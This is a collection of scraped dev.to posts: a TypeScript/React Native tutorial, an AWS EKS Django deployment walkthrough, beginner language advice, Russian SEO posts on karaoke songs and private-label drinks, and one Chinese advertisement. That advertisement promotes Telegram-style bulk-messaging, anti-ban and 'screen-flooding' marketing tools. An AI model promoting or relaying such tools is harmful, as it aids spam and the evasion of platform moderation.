## TypeScript in React Native: My Journey from Confusion to Clarity After a year of working with JavaScript, I was encouraged to learn TypeScript as I embarked on my mobile development journey. Having a solid foundation in React made the transition to React Native smoother. However, TypeScript introduces a new level of syntax complexity. In this guide, I will outline some key differences to assist new learners in their approach. I'll also share a crucial adjustment when moving from React to React Native in terms of styling. We'll explore these concepts through a fun project: a React Native app that fetches and displays city and state information based on a zip code. ## Embracing TypeScript Transitioning from JavaScript to TypeScript is like leveling up. Initially, I felt a lot of internal pushback, questioning the necessity since JavaScript works fine and I felt comfortable with it. However, after jumping into learning TypeScript on Codecademy, I gained skills that make my code more reliable and maintainable. JavaScript is flexible and forgiving, which can lead to hard-to-catch bugs. TypeScript adds static types to JavaScript, helping you catch errors at compile time. This can save hours of debugging and make your code more robust. As JavaScript was the first language I learned, I didn't initially understand the benefits of rigidity. However, after diving into more languages, I now appreciate its perks. JavaScript and TypeScript are similar, but differ in a few fundamental ways: 1. **Static Typing**: TypeScript allows you to define types for your variables, function parameters, and return values. 2. **Interfaces**: You can define custom types using interfaces. ```typescript interface User { name: string; age: number; } let user: User = { name: "Rafi", age: 22 }; ``` 3. **Generics**: TypeScript supports generics, allowing you to create reusable and type-safe components. ```typescript function identity<T>(arg: T): T { return arg; } let output = identity<string>("Hello"); ``` 4. **Type Inference**: TypeScript can infer types based on the values you assign, reducing the need for explicit type annotations. I am reminded of my time switching from DOM manipulation to React, where I took my old DOM manipulation projects and slowly reworked them. This process helped me internalize the exact differences in approach and workflow. I think the best way to learn and internalize is with an example, so let's dive into a React Native project and see how we can mentally switch from JavaScript to TypeScript. Fetching from external APIs is always a muscle I'm trying to flex, so I'll use that as an example: ##City and State Info Fetcher **Objective**:Create a React Native app that fetches and displays city and state information based on a zip code. ##Implementation 1. **Setup**: Initialize a new React Native project and install necessary dependencies. ```bash npx react-native init CityInfoApp cd CityInfoApp npm install axios ``` 2. **Create Components**: Create a component for input and displaying results. 3. **Fetch Data**: Use Axios to fetch data from an API. 4. **TypeScript Integration**: Add types for better code quality. First, I made a "sketch" in javascript. I am coding both to highlight the differences in syntax. ```javascript import React, { useState } from 'react'; import { ImageBackground, StyleSheet, Text, TextInput, TouchableOpacity, View } from 'react-native'; import { getUsersLocation } from './src/fetch-utils'; export default function App() { const [zipCode, setZipCode] = useState(''); const [location, setLocation] = useState(null); const [error, setError] = useState(null); const handleSubmit = async () => { let urlToGrab = `http://ZiptasticAPI.com/${zipCode}`; try { const locationData = await getUsersLocation(urlToGrab); setLocation(locationData); setError(null); } catch (error) { setLocation(null); setError('Error getting location data'); } }; ``` ### Converting to TypeScript The conversion process is straightforward. We'll start by renaming file extensions from `.js` to `.tsx`. Then, we'll add type annotations. #### Adding Type Annotations We'll define the types for our state and props. ```typescript import React, { useState } from 'react'; import { ImageBackground, StyleSheet, Text, TextInput, TouchableOpacity, View } from 'react-native'; import { getUsersLocation } from './src/fetch-utils'; interface Location { city: string; state: string; } export default function App() { const [zipCode, setZipCode] = useState<string>(''); const [location, setLocation] = useState<Location | null>(null); const [error, setError] = useState<string | null>(null); const handleSubmit = async () => { let urlToGrab = `http://ZiptasticAPI.com/${zipCode}`; try { const locationData = await getUsersLocation(urlToGrab); setLocation(locationData); setError(null); } catch (error) { setLocation(null); setError('Error getting location data'); } }; ``` Now let's add some styling! ## Styling in React Native Styling in React Native is similar to using CSS in web development but with some key differences. React Native uses a JavaScript object to define styles, which are then applied to components. There isn't a CSS file. ### Key Differences 1. **StyleSheet**: Styles are created using the `StyleSheet.create` method. 2. **Flexbox**: Layouts are managed using Flexbox, similar to CSS Flexbox but with some differences in default behavior. 3. **No Cascade**: Styles do not cascade as they do in CSS. Each component has its own styles. #### Example Styles Here's how I styled the app using React Native's `StyleSheet`: ```typescript const styles = StyleSheet.create({ background: { flex: 1, justifyContent: 'center', alignItems: 'center', }, container: { flex: 1, alignItems: 'center', justifyContent: 'center', padding: 16, width: '100%', borderRadius: 30, marginTop: '-40%', }, header: { fontSize: 24, color: 'white', marginBottom: 20, fontWeight: 'bold', }, inputContainer: { backgroundColor: 'rgba(255, 255, 255, 0.6)', borderRadius: 10, padding: 20, alignItems: 'center', width: '80%', }, input: { width: '100%', padding: 10, borderColor: 'white', borderWidth: 1, borderRadius: 25, marginBottom: 20, color: 'navy', backgroundColor: 'white', }, button: { backgroundColor: '#98e9ff', padding: 10, borderRadius: 10, }, buttonText: { color: 'white', fontWeight: 'bold', }, result: { marginTop: 20, fontSize: 18, color: 'navy', fontWeight: 'bold', }, error: { marginTop: 20, fontSize: 18, color: 'red', }, }); ``` ## Conclusion Switching from JavaScript to TypeScript and styling in React Native can initially seem daunting, but the benefits are well worth the effort. TypeScript's type safety and improved code readability, combined with React Native's powerful styling capabilities, make for a robust and maintainable codebase. Happy coding!
rafi_barides_faa6677ba16d
1,921,535
Deploying a Django App to Kubernetes with Amazon ECR and EKS
Today, I'll be deploying a simple Django App to practice using Docker and Kubernetes. I have a...
0
2024-07-12T20:37:48
https://dev.to/aktran321/deploying-a-django-app-to-kubernetes-with-amazon-ecr-and-eks-3736
Today, I'll be deploying a simple Django App to practice using Docker and Kubernetes. I have a simple setup. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4n8h5mehpkwtyy5fkwps.png) A directory with cloned git repo and a virtual environment. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tykkpg12x5kouv9syxdg.png) "kubesite" is the django project. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wll87rm6wz2bzxrmv7r7.png) And within it, I created an app that displays "Hello, world!", routed to the /hello path. Once I verified that the application works, I created my requirements.txt file ``` pip freeze > requirements.txt ``` This lists all the dependencies within the virtual environment. I then downloaded [Docker](https://docs.docker.com/get-docker/) and created my docker file. * touch Dockerfile ``` # Use the official Python image from the Docker Hub FROM python:3.12-slim # Set environment variables ENV PYTHONUNBUFFERED=1 # Set the working directory WORKDIR /app # Copy the requirements file into the container COPY requirements.txt /app/ # Install any needed packages specified in requirements.txt RUN pip install --no-cache-dir -r requirements.txt # Copy the current directory contents into the container at /app COPY . /app/ # Expose port 8000 EXPOSE 8000 # Run the Django server CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"] ``` I run the command `docker build -t my-django-app . ` which creates the Docker image shown on the desktop application. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uynqntx6w04fz8w4a6xc.png) Running `docker run -p 8000:8000 my-django-app ` I can open the url path and see that my application is successfully running on Docker. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a9r1qaaiylj3xvuszdec.png) Now, to deploy the application over Kubernetes, we can utilize Amazon ECR and EKS. Amazon Elastic Compute Registry will store the Docker container image. Amazon Elastic Kubernetes Service will deploy Kubernetes clusters and allows AWS to handle control plane operations. In my CLI, I run ``` aws ecr get-login-password --region <my-region> | docker login --username AWS --password-stdin <my-account-id>.dkr.ecr.<my-region>.amazonaws.com ``` to authenticate Docker with my ECR registry. I run ``` docker tag my-django-app:latest <my-account-id>.dkr.ecr.<my-region>.amazonaws.com/my-django-app:latest ``` to tag the docker image. Finally, I push the image to ECR ``` docker push <your-account-id>.dkr.ecr.<your-region>.amazonaws.com/my-django-app:latest ``` ## EKS Now, I navigate to Amazon EKS in the AWS console and create a cluster with the name "my-django-app". I kept default settings, but also created a security group with this permission ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3zwyznqsowo0hec45ce0.png) This will allow the Kubernetes control plane access to AWS Resources. The clusters take awhile to create, but once that is finished, I connect to the EKS cluster with the following command: ``` aws eks update-kubeconfig --region <my-region> --name <my-cluster-name> ``` I created this yaml file in my project, which will set the configurations for my deployment ``` apiVersion: apps/v1 kind: Deployment metadata: name: my-django-app spec: replicas: 3 selector: matchLabels: app: my-django-app template: metadata: labels: app: my-django-app spec: containers: - name: my-django-app image: <my-account-id>.dkr.ecr.<my-region>.amazonaws.com/my-django-app:latest ports: - containerPort: 8000 --- apiVersion: v1 kind: Service metadata: name: my-django-app spec: type: LoadBalancer selector: app: my-django-app ports: - protocol: TCP port: 80 targetPort: 8000 ``` I then apply the deployment to the EKS cluster ``` kubectl apply -f deployment.yaml ``` Check the pods are running ``` kubectl get pods ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u7sv3uv5axbl6vhrh7p2.png) My pods are not currently running as I need to configure a worker node group in the EKS console. I specified min=1, max=3, desired=2 using a t2.medium and a security group that allowed inbound SSH from my IP. I have to re-run the deployment and then run `kubectl get pods` again. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/80kprscgzxyci11cnbto.png) And verify the service's external IP ``` kubectl get svc ``` I can now access my app through the IP. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h5w8cbebric9ak550fxi.png) And here it is! ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/axjstft2wha5qegr2bqa.png) ## Cleanup Delete the deployment ``` kubectl delete -f deployment.yaml ``` and verify the deletion ``` kubectl get pods kubectl get svc ``` The EKS Cluster, the attached node group and ECR repository were deleted manually through the AWS console. Deploying a simple Django application using Docker and Kubernetes has been a practical and useful experience. This process, from building a Docker image to pushing it to Amazon ECR and deploying it on Amazon EKS, shows how these tools work together to manage application deployment. Starting from a local setup and moving to a cloud deployment gives you a clear understanding of current DevOps practices. Cleaning up the resources afterward ensures you avoid unnecessary costs and keeps your AWS environment tidy. This project not only enhances your understanding of Docker and Kubernetes but also prepares you for deploying more complex applications in the future.
aktran321
1,921,541
Your First Programming Language: A Strategic Guide for Beginners
In today's tech-driven world, there seems to be an overwhelming number of programming languages to...
0
2024-07-12T20:08:27
https://dev.to/sharoztanveer/your-first-programming-language-a-strategic-guide-for-beginners-29ka
programming, softwareengineering, python, c
In today's tech-driven world, there seems to be an overwhelming number of programming languages to choose from. This article aims to simplify your journey into programming by guiding you on which languages to learn and in what order, ensuring you learn to program as efficiently as possible. As technology permeates every industry, programming skills are increasingly sought after in job postings. For newcomers, the abundance of resources can be both a blessing and a curse, creating confusion about where to begin. With languages like `Python`, `Rust`, `Go`, `C++`, and `Javascript`, choosing the right one to start with can be daunting. ## Step 1: Learn How Computers Work with C The first step in your programming journey should be understanding how computers operate, and the best language for this is C. Despite being considered low-level and seemingly outdated, C offers invaluable insights into the inner workings of computers. It teaches you about memory management, registers, and the processor's functions, providing a solid foundation for all future programming endeavours. C can be challenging and prone to crashes, but this difficulty is a strength. It eliminates guesswork, allowing you to see exactly what your code does, and thus deepening your understanding of how computers execute programs. By working with C, you gain absolute control over the machine, learning about operating systems, kernel interfaces, and system calls. ## Step 2: Learn to Program with Python After grasping the fundamentals of computer operations with C, the next step is to learn how to program effectively. This is best achieved with an interpreted language, and Python is an excellent choice. Known for its readability and user-friendly syntax, Python allows you to focus on learning programming concepts without the distractions of low-level details. Python's extensive library support means you can easily find tools for networking, threading, and even creating ASCII art. Its versatility and simplicity make it an ideal language for learning data structures, algorithms, and other essential programming skills. ## Embrace Mistakes and Learn from Them A crucial aspect of learning to program is being comfortable with making mistakes. As a beginner, errors are inevitable, but they are also opportunities for growth. Adopting the mindset of "failing forward" means taking each mistake as a learning experience, refining your skills with each iteration. For example, if your C program crashes due to pointer misuse, analyse the error, understand what went wrong, and apply that knowledge to become a better programmer. Persistence and a willingness to learn from failures are key to your success in programming. ## Conclusion In summary, starting with C to understand computer fundamentals, followed by Python to learn programming concepts, provides a strong foundation for any aspiring programmer. Embrace the challenges and mistakes along the way, and you'll find yourself growing and improving continuously. Happy coding! --- > [Disclosure: This article is a collaborative effort, combining my own ideas with the assistance of ChatGPT for enhanced articulation.]
sharoztanveer
1,921,544
growing linkedin using aws learnings?
is it a good idea to share your day to day learning about aws on linkedin? like growing your linkedin...
0
2024-07-12T19:04:25
https://dev.to/newjourney_95874cd87b2724/growing-linkedin-using-aws-learnings-4kke
aws, learning, cloudcomputing, cloudpractitioner
is it a good idea to share your day to day learning about aws on linkedin? like growing your linkedin account instead of writing articles?
newjourney_95874cd87b2724
1,921,545
ТОП-10 самых легких песен караоке в Москве
Одним из самых любимых и веселых развлечений современной молодежи и не только, можно смело назвать...
0
2024-07-12T19:05:28
https://dev.to/sevencode/top-10-samykh-lieghkikh-piesien-karaokie-v-moskvie-1ecd
Одним из самых любимых и веселых развлечений современной молодежи и не только, можно смело назвать караоке. Именно здесь, компании друзей, влюбленные парочки, родные люди могут насладиться общением, отдохнуть душой и телом. Даже если вы считаете, что пение совершенно не ваша сильная сторона. Есть несколько беспроигрышных вариантов для каждого. Самые легкие песни для караоке смогут создать положительное настроение и подарить незабываемый приятный вечер всем участникам встречи. Топ легких современных песен: «В каждом маленьком ребёнке» — из м/ф «Обезьянки, вперед» - задорная музыка и речитативное восприятие текста помогает петь эту композицию без особых усилий; «Батарейка» — группа «Жуки» - простая и веселая песня для компаний разного возраста; «WWW Leningrad» — группировка «Ленинград» - когда хочется немного покричать и отвести душу; «Я убью тебя, лодочник» — Профессор Лебединский – еще один вариант для шумной компании, простое исполнение, слова, легкий ритм; «Два кусочека колбаски» — группа «Комбинация» - вариант легкой песни в караоке для девушек; «Владивосток 2000» — группа «Мумий Тролль» - музыка, вызывающая ностальгию и приятные воспоминания о нулевых; «Чудная долина» — Mr. Credo – романтическая песня, подойдет мужчинам и женщинам; «Красавица» — группа «Фактор-2» - легкие современные песни для караоке для ценителей уличного стиля, ганстер-темы; «Мой друг» — группа «Машина времени» - душевная и спокойная песня для компаний старых знакомых; «Пчеловод» — группа «RASA» - это вариант песни, которую легко петь в караоке. Она всем знаком и вызывает желание подпевать и пританцовывать в такт. Источник: [monterossocafe.ru](https://monterossocafe.ru)
sevencode
1,921,546
发防封号助手,获客霸屏工具
纸飞机营销获客系统,获客群发防封号助手,获客霸屏工具 了解相关软件请登录 http://www.vst.tw...
0
2024-07-12T19:07:18
https://dev.to/qagv_mfot_30e81d81bdc3b1a/fa-fang-feng-hao-zhu-shou-huo-ke-ba-ping-gong-ju-8a7
纸飞机营销获客系统,获客群发防封号助手,获客霸屏工具 了解相关软件请登录 http://www.vst.tw 纸飞机营销获客系统,重新定义数字营销的新篇章 在当今这个信息爆炸的时代,纸飞机营销获客系统以其独特的魅力和高效的性能,成为了众多企业争相追捧的营销利器。该系统通过精准定位目标客户群体,利用大数据和人工智能技术,实现营销信息的精准推送,帮助企业快速获客并提升品牌影响力。 纸飞机营销获客系统的特点在于其高度的智能化和个性化。它能够根据用户的浏览历史、购买行为等多维度数据,为用户画像,从而推送更符合其兴趣和需求的营销信息。这种个性化的推送方式,不仅提高了用户的点击率和转化率,还增强了用户对企业品牌的认知度和好感度。 此外,纸飞机营销获客系统还具备强大的数据分析功能。通过对营销活动的实时监测和数据分析,企业可以及时了解市场动态和用户需求变化,从而调整营销策略,实现更加精准和高效的营销效果。 总之,纸飞机营销获客系统以其独特的优势,为企业提供了全新的营销思路和获客方式。在未来的数字营销领域,它必将继续发挥其重要作用,为企业带来更多的商机和成功。 了解相关软件请登录 http://www.vst.tw Tag:获客营销机器人,获客营销软件,获客引流软件,获客获取软件,获客加粉软件,获客群控机器人,获客群控软件,获客群控群控,获客群控专家,获客群控大师机器人,获客群控推广软件,获客群控引流工具,获客营销大师,获客推广专家
qagv_mfot_30e81d81bdc3b1a
1,921,547
Производство напитков СТМ под вашим брендом
Производство напитков под собственным брендом может иметь несколько преимуществ: Уникальность...
0
2024-07-12T19:07:21
https://dev.to/sevencode/proizvodstvo-napitkov-stm-pod-vashim-briendom-1hj6
Производство напитков под собственным брендом может иметь несколько преимуществ: 1. Уникальность продукта: Вы сможете создать уникальные рецептуры и вкусы, которые отличаются от того, что предлагается другими брендами. Это позволит вам выделиться на рынке и привлечь внимание потребителей. 2. Контроль качества: При производстве напитков под своим брендом вы сможете контролировать каждый этап производства, начиная с выбора ингредиентов и заканчивая упаковкой. Это позволит вам гарантировать высокое качество продукции. 3. Гибкость в ассортименте: Вы сможете быстро реагировать на изменения вкусовых предпочтений потребителей и вносить изменения в ассортимент продукции, не завися от сторонних поставщиков. 4. Увеличение маржинальности: Производство собственного бренда может помочь увеличить маржинальность вашего бизнеса, поскольку вы будете контролировать все затраты на производство и упаковку. 5. Брендирование: Производство под собственным брендом позволит вам создать узнаваемый образ и лояльность потребителей к вашему продукту. 6. Возможность диверсификации: При наличии собственного производства вы сможете расширить свой бизнес за счет добавления новых напитков или даже других продуктов, что способствует диверсификации вашего портфеля продукции. Однако стоит помнить, что производство под собственным брендом также требует значительных инвестиций в оборудование, разработку рецептур, маркетинг и управление цепочкой поставок. Источник: [evo-stm.ru](https://evo-stm.ru)
sevencode